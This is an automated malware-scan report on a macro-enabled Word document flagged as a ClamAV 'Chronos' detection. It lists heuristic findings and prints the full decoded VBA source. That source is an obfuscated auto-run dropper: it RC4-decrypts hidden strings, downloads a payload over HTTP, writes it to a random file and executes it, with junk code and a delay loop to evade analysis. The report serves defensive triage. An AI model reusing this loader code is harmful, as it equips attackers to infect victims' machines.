MALICIOUS
360
Risk Score
Heuristics 11
-
ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
-
VBA project inside OOXML medium 6 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set YryQdthx = CreateObject(PT1MPEetzdZ7c1(Chr(8) + Chr(196) + Chr(215) + Chr(3) + Chr(89) + Chr(208) + Chr(68) + Chr(90) + Chr(162) + Chr(59) + Chr(81) + Chr(134) + Chr(181) + Chr(160) + Chr(77) + Chr(185) + Chr(41) + Chr(230) + Chr(61) + Chr(106), "McpOWLCwAjF")) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set YryQdthx = CreateObject(PT1MPEetzdZ7c1(Chr(8) + Chr(196) + Chr(215) + Chr(3) + Chr(89) + Chr(208) + Chr(68) + Chr(90) + Chr(162) + Chr(59) + Chr(81) + Chr(134) + Chr(181) + Chr(160) + Chr(77) + Chr(185) + Chr(41) + Chr(230) + Chr(61) + Chr(106), "McpOWLCwAjF")) -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
CallByName Svo2b4mDM0WV, 61, VbMethod, 5, 73, 93 -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Sub Document_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
DrpSr = Environ(PT1MPEetzdZ7c1(Chr(170) + Chr(15) + Chr(31) + Chr(184) + Chr(70) + Chr(172) + Chr(13), "Fgqe7pmN9")) & "\" & JcDyxQB5qJX0 & PT1MPEetzdZ7c1(Chr(136) + Chr(149) + Chr(0) + Chr(5), "IMdqWyjHXnxpZ") -
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12751 bytes |
SHA-256: 14e2fed1fdee36dd5296b26dab969a80b93c7197a0b017e6002afd76ac2e03ed |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
104 of 176 identifiers look randomly generated (e.g. 'Ud6e42tkuSy4bP0bNs5ndOg7') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Sub M8ohQVtby3()
Dim TP8wTff7r38 As Long, A9OxmVfQnN7 As Long
TP8wTff7r38 = 83
A9OxmVfQnN7 = 90
If TP8wTff7r38 + A9OxmVfQnN7 > 2 Then
A9OxmVfQnN7 = TP8wTff7r38 + 95
Else
MsgBox 80
End If
Dim DrpSr As String, YryQdthx As Object, Yh69e As Integer
Dim YBnXWTbAm As Long, I6aRk8CiiJH As Long
YBnXWTbAm = 44
I6aRk8CiiJH = 81
If YBnXWTbAm + I6aRk8CiiJH > 2 Then
I6aRk8CiiJH = YBnXWTbAm + 96
Else
MsgBox 76
End If
DrpSr = Environ(PT1MPEetzdZ7c1(Chr(170) + Chr(15) + Chr(31) + Chr(184) + Chr(70) + Chr(172) + Chr(13), "Fgqe7pmN9")) & "\" & JcDyxQB5qJX0 & PT1MPEetzdZ7c1(Chr(136) + Chr(149) + Chr(0) + Chr(5), "IMdqWyjHXnxpZ")
Dim XtDO0qv17JHzP As Long, HzCCOSV As Long
XtDO0qv17JHzP = 69
HzCCOSV = 8
If XtDO0qv17JHzP + HzCCOSV > 2 Then
HzCCOSV = XtDO0qv17JHzP + 18
Else
MsgBox 34
End If
Set YryQdthx = CreateObject(PT1MPEetzdZ7c1(Chr(8) + Chr(196) + Chr(215) + Chr(3) + Chr(89) + Chr(208) + Chr(68) + Chr(90) + Chr(162) + Chr(59) + Chr(81) + Chr(134) + Chr(181) + Chr(160) + Chr(77) + Chr(185) + Chr(41) + Chr(230) + Chr(61) + Chr(106), "McpOWLCwAjF"))
Dim EazVllelnZ As Long, GBdvm09cFJn1Hr As Long
EazVllelnZ = 95
GBdvm09cFJn1Hr = 80
If EazVllelnZ + GBdvm09cFJn1Hr > 2 Then
GBdvm09cFJn1Hr = EazVllelnZ + 28
Else
MsgBox 57
End If
YryQdthx.Open PT1MPEetzdZ7c1(Chr(84) + Chr(107) + Chr(83), "Pmp53rd"), PT1MPEetzdZ7c1(Chr(193) + Chr(242) + Chr(103) + Chr(222) + Chr(7) + Chr(10) + Chr(203) + Chr(255) + Chr(28) + Chr(114) + Chr(121) + Chr(5) + Chr(93) + Chr(216) + Chr(218) + Chr(251) + Chr(111) + Chr(247) + Chr(145) + Chr(87) + Chr(135) + Chr(78) + Chr(197) + Chr(83) + Chr(67) + Chr(163) + Chr(98), "AJHvpx"), False
Dim JGIcO3YBJocRd As Long, V6J0qqj8f4hSQEGnY As Long
JGIcO3YBJocRd = 53
V6J0qqj8f4hSQEGnY = 58
If JGIcO3YBJocRd + V6J0qqj8f4hSQEGnY > 2 Then
V6J0qqj8f4hSQEGnY = JGIcO3YBJocRd + 42
Else
MsgBox 90
End If
YryQdthx.setRequestHeader PT1MPEetzdZ7c1(Chr(143) + Chr(117) + Chr(140) + Chr(252) + Chr(215) + Chr(13) + Chr(186) + Chr(49) + Chr(96) + Chr(12), "VPu6PxOZV5"), PT1MPEetzdZ7c1(Chr(11) + Chr(102) + Chr(242) + Chr(106) + Chr(87) + Chr(163) + Chr(58) + Chr(34) + Chr(234) + Chr(101) + Chr(155), "CdN8qyV")
YryQdthx.send
If YryQdthx.Status = 200 Then
Dim Y3vCNdiP7Vz6 As Long, TyqnBQroC74hmFh As Long
Y3vCNdiP7Vz6 = 63
TyqnBQroC74hmFh = 26
If Y3vCNdiP7Vz6 + TyqnBQroC74hmFh > 2 Then
TyqnBQroC74hmFh = Y3vCNdiP7Vz6 + 38
Else
MsgBox 75
End If
Yh69e = FreeFile
Open DrpSr For Binary Access Write Lock Write As #Yh69e
Put #Yh69e, , PT1MPEetzdZ7c1(StrConv(YryQdthx.ResponseBody, vbUnicode), PT1MPEetzdZ7c1(Chr(9) + Chr(169) + Chr(104) + Chr(18) + Chr(164) + Chr(18) + Chr(97) + Chr(128) + Chr(100), "UljByQ05"))
Close #Yh69e
Dim RLzoc As Long, HE0B81bq6UzaU8pph As Long
RLzoc = 84
HE0B81bq6UzaU8pph = 89
If RLzoc + HE0B81bq6UzaU8pph > 2 Then
HE0B81bq6UzaU8pph = RLzoc + 73
Else
MsgBox 22
End If
PGIu5vM1Qn 1
Dim CQUJn1Hr As Long, PNE5jpR3JyejFMH As Long
CQUJn1Hr = 98
PNE5jpR3JyejFMH = 22
If CQUJn1Hr + PNE5jpR3JyejFMH > 2 Then
PNE5jpR3JyejFMH = CQUJn1Hr + 98
Else
MsgBox 93
End If
CreateObject(PT1MPEetzdZ7c1(Chr(158) + Chr(254) + Chr(142) + Chr(209) + Chr(80) + Chr(79) + Chr(235) + Chr(54) + Chr(10) + Chr(196) + Chr(206) + Chr(60) + Chr(137), "C5pjnjDpia")).Run """" & DrpSr & """"
Dim VBGJQgsL4Qp As Long, XB9ySBq6aW As Long
VBGJQgsL4Qp = 10
XB9ySBq6aW = 9
If VBGJQgsL4Qp + XB9ySBq6aW > 2 Then
XB9ySBq6aW = VBGJQgsL4Qp + 39
Else
MsgBox 46
End If
End If
Dim MkJcNYIE6pN As Long, MoSP5mqqf As Long
MkJcNYIE6pN = 87
MoSP5mqqf = 37
If MkJcNYIE6pN + MoSP5mqqf > 2 Then
MoSP5mqqf = MkJcNYIE6pN + 53
Else
MsgBox 32
End If
Set YryQdthx = Nothing
Dim Hq5xUCu2 As Long, YJPPvWf6 As Long
Hq5xUCu2 = 73
YJPPvWf6 = 95
If Hq5xUCu2 + YJPPvWf6 > 2 Then
YJPPvWf6 = Hq5xUCu2 + 3
Else
MsgBox 31
End If
End Sub
Sub Document_Open()
Dim Ogk As Long, X5vIt7r8h3 As Long
Ogk = 26
X5vIt7r8h3 = 60
If Ogk + X5vIt7r8h3 > 2 Then
X5vIt7r8h3 = Ogk + 10
Else
MsgBox 60
End If
Dim IpYsso As Long, KAC7zQ7WcNtG As Long, KMvRU3vVJUdmz As Long
Dim Tf6qrpetCe As Long, ICguDWLjZacFKiMw As Long
Tf6qrpetCe = 30
ICguDWLjZacFKiMw = 47
If Tf6qrpetCe + ICguDWLjZacFKiMw > 2 Then
ICguDWLjZacFKiMw = Tf6qrpetCe + 48
Else
MsgBox 45
End If
IpYsso = 972996613: KAC7zQ7WcNtG = 0: KMvRU3vVJUdmz = 0
Dim Uhx1DdrNEYX5OzJ1 As Long, IOODh84ChY6T As Long
Uhx1DdrNEYX5OzJ1 = 59
IOODh84ChY6T = 13
If Uhx1DdrNEYX5OzJ1 + IOODh84ChY6T > 2 Then
IOODh84ChY6T = Uhx1DdrNEYX5OzJ1 + 51
Else
MsgBox 11
End If
For KAC7zQ7WcNtG = 1 To IpYsso
KMvRU3vVJUdmz = KMvRU3vVJUdmz + 1
Next KAC7zQ7WcNtG
Dim TTi9cJZlPqzyBgiCT As Long, TlyzDtmVZ As Long
TTi9cJZlPqzyBgiCT = 3
TlyzDtmVZ = 55
If TTi9cJZlPqzyBgiCT + TlyzDtmVZ > 2 Then
TlyzDtmVZ = TTi9cJZlPqzyBgiCT + 98
Else
MsgBox 95
End If
If KMvRU3vVJUdmz = IpYsso Then
Dim TMFAJ6K As Long, G9JerWSr As Long
TMFAJ6K = 57
G9JerWSr = 91
If TMFAJ6K + G9JerWSr > 2 Then
G9JerWSr = TMFAJ6K + 15
Else
MsgBox 92
End If
M8ohQVtby3
Dim YJkX55kfp67iUD As Long, C54X1JD As Long
YJkX55kfp67iUD = 17
C54X1JD = 85
If YJkX55kfp67iUD + C54X1JD > 2 Then
C54X1JD = YJkX55kfp67iUD + 7
Else
MsgBox 18
End If
Else
Dim OJcNYIE6pNa7XBk As Long, W9FBazQrhT As Long
OJcNYIE6pNa7XBk = 53
W9FBazQrhT = 32
If OJcNYIE6pNa7XBk + W9FBazQrhT > 2 Then
W9FBazQrhT = OJcNYIE6pNa7XBk + 93
Else
MsgBox 84
End If
GoU1kg2
Dim LwY2RpAJPd As Long, Ud6e42tkuSy4bP0bNs5ndOg7 As Long
LwY2RpAJPd = 18
Ud6e42tkuSy4bP0bNs5ndOg7 = 13
If LwY2RpAJPd + Ud6e42tkuSy4bP0bNs5ndOg7 > 2 Then
Ud6e42tkuSy4bP0bNs5ndOg7 = LwY2RpAJPd + 1
Else
MsgBox 36
End If
End If
Dim MDAAGyHZ2mblF As Long, I4o781Nb3UCh As Long
MDAAGyHZ2mblF = 73
I4o781Nb3UCh = 20
If MDAAGyHZ2mblF + I4o781Nb3UCh > 2 Then
I4o781Nb3UCh = MDAAGyHZ2mblF + 54
Else
MsgBox 4
End If
End Sub
Function JcDyxQB5qJX0() As String
Dim Fkwh8YJSQHSN As Long, YvoMiC00Dk As Long
Fkwh8YJSQHSN = 67
YvoMiC00Dk = 62
If Fkwh8YJSQHSN + YvoMiC00Dk > 2 Then
YvoMiC00Dk = Fkwh8YJSQHSN + 6
Else
MsgBox 48
End If
Dim MIgKeqzq5j() As Byte, W7wqxUbclDnDkE() As Byte, IwxEP6V As Long, CSz3McKsdql As Long, PQAXJFrAXb00KfBhs As String, R72Ykj As String, RIuSUW7qrdQfIk As Long
Dim CnKMWENE As Long, W3OWLB1scSUU9R8xj As Long
CnKMWENE = 8
W3OWLB1scSUU9R8xj = 89
If CnKMWENE + W3OWLB1scSUU9R8xj > 2 Then
W3OWLB1scSUU9R8xj = CnKMWENE + 71
Else
MsgBox 98
End If
RIuSUW7qrdQfIk = 0
Dim L2QvuJgl9Y As Long, O6Yo4QT8NK7mwQp As Long
L2QvuJgl9Y = 66
O6Yo4QT8NK7mwQp = 92
If L2QvuJgl9Y + O6Yo4QT8NK7mwQp > 2 Then
O6Yo4QT8NK7mwQp = L2QvuJgl9Y + 86
Else
MsgBox 53
End If
GixUfR4WYaURE:
Dim WLyV4bE48EHa0lb As Long, DuiL3092JiFDX As Long
WLyV4bE48EHa0lb = 37
DuiL3092JiFDX = 55
If WLyV4bE48EHa0lb + DuiL3092JiFDX > 2 Then
DuiL3092JiFDX = WLyV4bE48EHa0lb + 1
Else
MsgBox 64
End If
Randomize
R72Ykj = Int(30 * Rnd)
If R72Ykj < 4 Then GoTo GixUfR4WYaURE
RIuSUW7qrdQfIk = R72Ykj
If RIuSUW7qrdQfIk > 0& Then
Dim Parey3 As Long, ECcRwzs5mYGY9mmYf As Long
Parey3 = 50
ECcRwzs5mYGY9mmYf = 17
If Parey3 + ECcRwzs5mYGY9mmYf > 2 Then
ECcRwzs5mYGY9mmYf = Parey3 + 16
Else
MsgBox 91
End If
PQAXJFrAXb00KfBhs = PT1MPEetzdZ7c1(Chr(97) + Chr(211) + Chr(236) + Chr(191) + Chr(44) + Chr(22) + Chr(209) + Chr(8) + Chr(84) + Chr(196), "Fe42tkuS57cU")
Randomize
MIgKeqzq5j = PQAXJFrAXb00KfBhs
IwxEP6V = Len(PQAXJFrAXb00KfBhs) - 1&
RIuSUW7qrdQfIk = (RIuSUW7qrdQfIk * 2&) - 1&
ReDim W7wqxUbclDnDkE(RIuSUW7qrdQfIk) As Byte
Dim LR7spMk6D0wu52NsM As Long, K6VLntzVfU As Long
LR7spMk6D0wu52NsM = 72
K6VLntzVfU = 97
If LR7spMk6D0wu52NsM + K6VLntzVfU > 2 Then
K6VLntzVfU = LR7spMk6D0wu52NsM + 95
Else
MsgBox 27
End If
For CSz3McKsdql = 0& To RIuSUW7qrdQfIk Step 2&
W7wqxUbclDnDkE(CSz3McKsdql) = MIgKeqzq5j(CLng(IwxEP6V * Rnd) * 2&)
Next
Dim FAHBwCM02hOV1 As Long, FSsARDR2d9Sy As Long
FAHBwCM02hOV1 = 10
FSsARDR2d9Sy = 13
If FAHBwCM02hOV1 + FSsARDR2d9Sy > 2 Then
FSsARDR2d9Sy = FAHBwCM02hOV1 + 75
Else
MsgBox 87
End If
End If
Dim DKi4AJl3gpl As Long, E5QXhvytzcgcd As Long
DKi4AJl3gpl = 77
E5QXhvytzcgcd = 56
If DKi4AJl3gpl + E5QXhvytzcgcd > 2 Then
E5QXhvytzcgcd = DKi4AJl3gpl + 18
Else
MsgBox 35
End If
JcDyxQB5qJX0 = W7wqxUbclDnDkE
Dim BjhItY8w As Long, Uzlq5s6ZpoEqWK4N As Long
BjhItY8w = 2
Uzlq5s6ZpoEqWK4N = 82
If BjhItY8w + Uzlq5s6ZpoEqWK4N > 2 Then
Uzlq5s6ZpoEqWK4N = BjhItY8w + 65
Else
MsgBox 91
End If
End Function
Sub GoU1kg2()
Dim SDsZ9Qs89ZGH0iL As Long, JynrHdQTEk As Long
SDsZ9Qs89ZGH0iL = 45
JynrHdQTEk = 4
If SDsZ9Qs89ZGH0iL + JynrHdQTEk > 2 Then
JynrHdQTEk = SDsZ9Qs89ZGH0iL + 29
Else
MsgBox 27
End If
Round 18, 87
Hour 52
PonEXfGyzdq = Dir("JcC3aqyYvgXz")
TimeSerial 57, 96, 51
Log 60
LoadPicture 86, 80, 47, 73, 22
M2GFyg3qRjh = Cos(10)
FreeFile 22
Weekday 74
Second 90
DateAdd "MCz", 15, 69
Command
Partition 7, 67, 13, 48
Rate 97, 48, 69
HCukMspMk6D = EOF(58)
Reset
WeekdayName 93
CallByName Svo2b4mDM0WV, 61, VbMethod, 5, 73, 93
Stop
If IsNumeric(6) = True Then YNUoCgUoI = 97
ChDrive 20
Err.Raise 53
App.LogEvent "L4A6ndpxNQ"
VAEjgCRgjTpOQ = CVDate(81)
Xd4UDxCX2 = CVar(96)
IPmt 98, 17, 62, 52
Join RLyDNjlJxj5jB, 10
Load MoXneNnOx7rTJC
GetAllSettings 13, 75
DateDiff "SdYB6AyIYZNKY3k1K", 87, 25
Dim UwogOGlQixgWrTFr As Long, QG1CXIRjWycr7B As Long
UwogOGlQixgWrTFr = 55
QG1CXIRjWycr7B = 55
If UwogOGlQixgWrTFr + QG1CXIRjWycr7B > 2 Then
QG1CXIRjWycr7B = UwogOGlQixgWrTFr + 31
Else
MsgBox 4
End If
End Sub
Function PT1MPEetzdZ7c1(ByVal VXFQ3 As String, ByVal KQGW3hk7 As String) As String
Dim YkKUkKQ7ycJm As Long, BivKUR As Long
YkKUkKQ7ycJm = 33
BivKUR = 97
If YkKUkKQ7ycJm + BivKUR > 2 Then
BivKUR = YkKUkKQ7ycJm + 3
Else
MsgBox 42
End If
On Error Resume Next
Dim CWDc4 As Long, WkYOjY As Long
CWDc4 = 28
WkYOjY = 86
If CWDc4 + WkYOjY > 2 Then
WkYOjY = CWDc4 + 38
Else
MsgBox 10
End If
Dim E4RR4VFJ4IqXc(0 To 255) As Integer, QobAHUTR8 As Long, QikW2g48gS5md7k45 As Long, HtLY9DJwS859 As Long, XLn97YyNPhW9R() As Byte, PgyWGgCo9XM() As Byte, JU14iMogQsw As Byte
Dim HtYPC0EY As Long, NTcNU6KOStI As Long
HtYPC0EY = 16
NTcNU6KOStI = 21
If HtYPC0EY + NTcNU6KOStI > 2 Then
NTcNU6KOStI = HtYPC0EY + 6
Else
MsgBox 53
End If
XLn97YyNPhW9R() = StrConv(KQGW3hk7, vbFromUnicode)
Dim JTEn4iDNbk0 As Long, Ue4F5Qc As Long
JTEn4iDNbk0 = 91
Ue4F5Qc = 46
If JTEn4iDNbk0 + Ue4F5Qc > 2 Then
Ue4F5Qc = JTEn4iDNbk0 + 83
Else
MsgBox 44
End If
For QobAHUTR8 = 0 To 255
E4RR4VFJ4IqXc(QobAHUTR8) = QobAHUTR8
Next QobAHUTR8
QobAHUTR8 = 0
QikW2g48gS5md7k45 = 0
HtLY9DJwS859 = 0
For QobAHUTR8 = 0 To 255
QikW2g48gS5md7k45 = (QikW2g48gS5md7k45 + E4RR4VFJ4IqXc(QobAHUTR8) + XLn97YyNPhW9R(QobAHUTR8 Mod Len(KQGW3hk7))) Mod 256
JU14iMogQsw = E4RR4VFJ4IqXc(QobAHUTR8)
E4RR4VFJ4IqXc(QobAHUTR8) = E4RR4VFJ4IqXc(QikW2g48gS5md7k45)
E4RR4VFJ4IqXc(QikW2g48gS5md7k45) = JU14iMogQsw
Next QobAHUTR8
QobAHUTR8 = 0
QikW2g48gS5md7k45 = 0
HtLY9DJwS859 = 0
PgyWGgCo9XM() = StrConv(VXFQ3, vbFromUnicode)
For QobAHUTR8 = 0 To Len(VXFQ3)
QikW2g48gS5md7k45 = (QikW2g48gS5md7k45 + 1) Mod 256
HtLY9DJwS859 = (HtLY9DJwS859 + E4RR4VFJ4IqXc(QikW2g48gS5md7k45)) Mod 256
JU14iMogQsw = E4RR4VFJ4IqXc(QikW2g48gS5md7k45)
E4RR4VFJ4IqXc(QikW2g48gS5md7k45) = E4RR4VFJ4IqXc(HtLY9DJwS859)
E4RR4VFJ4IqXc(HtLY9DJwS859) = JU14iMogQsw
PgyWGgCo9XM(QobAHUTR8) = PgyWGgCo9XM(QobAHUTR8) Xor (E4RR4VFJ4IqXc((E4RR4VFJ4IqXc(QikW2g48gS5md7k45) + E4RR4VFJ4IqXc(HtLY9DJwS859)) Mod 256))
Next QobAHUTR8
Dim Ak1fCnNiw As Long, XsQ7zWU378CX9t As Long
Ak1fCnNiw = 56
XsQ7zWU378CX9t = 30
If Ak1fCnNiw + XsQ7zWU378CX9t > 2 Then
XsQ7zWU378CX9t = Ak1fCnNiw + 81
Else
MsgBox 25
End If
PT1MPEetzdZ7c1 = StrConv(PgyWGgCo9XM, vbUnicode)
Dim W8NXkwuK As Long, Mbi0jxP As Long
W8NXkwuK = 3
Mbi0jxP = 62
If W8NXkwuK + Mbi0jxP > 2 Then
Mbi0jxP = W8NXkwuK + 58
Else
MsgBox 23
End If
End Function
Sub PGIu5vM1Qn(YnjKoH8aZapeBU0 As Long)
Dim QY7cWkfrGHsX As Long, Dz1eCP As Long
QY7cWkfrGHsX = 72
Dz1eCP = 81
If QY7cWkfrGHsX + Dz1eCP > 2 Then
Dz1eCP = QY7cWkfrGHsX + 52
Else
MsgBox 39
End If
Dim G5DJEpCyddr As Long
Dim WKOACQPPmy0Plu As Long, MrBrIHOPHF2g6NzYPV As Long
WKOACQPPmy0Plu = 73
MrBrIHOPHF2g6NzYPV = 25
If WKOACQPPmy0Plu + MrBrIHOPHF2g6NzYPV > 2 Then
MrBrIHOPHF2g6NzYPV = WKOACQPPmy0Plu + 96
Else
MsgBox 28
End If
G5DJEpCyddr = Timer + YnjKoH8aZapeBU0
Do While Timer < G5DJEpCyddr
DoEvents
Loop
Dim XEkdhB4 As Long, GfZWc47F As Long
XEkdhB4 = 7
GfZWc47F = 51
If XEkdhB4 + GfZWc47F > 2 Then
GfZWc47F = XEkdhB4 + 64
Else
MsgBox 78
End If
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 32768 bytes |
SHA-256: 613d68688940d50bcc50e2e71e8da478c08097d2794f72a8e6f833bbbac00abe |
|||
|
Detection
ClamAV:
Doc.Malware.Chronos-6897935-0
Obfuscation or payload:
likely
193 of 351 identifiers look randomly generated (e.g. 'Ud6e42tkuSy4bP0bNs5ndOg7') — consistent with name-mangling obfuscation.
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.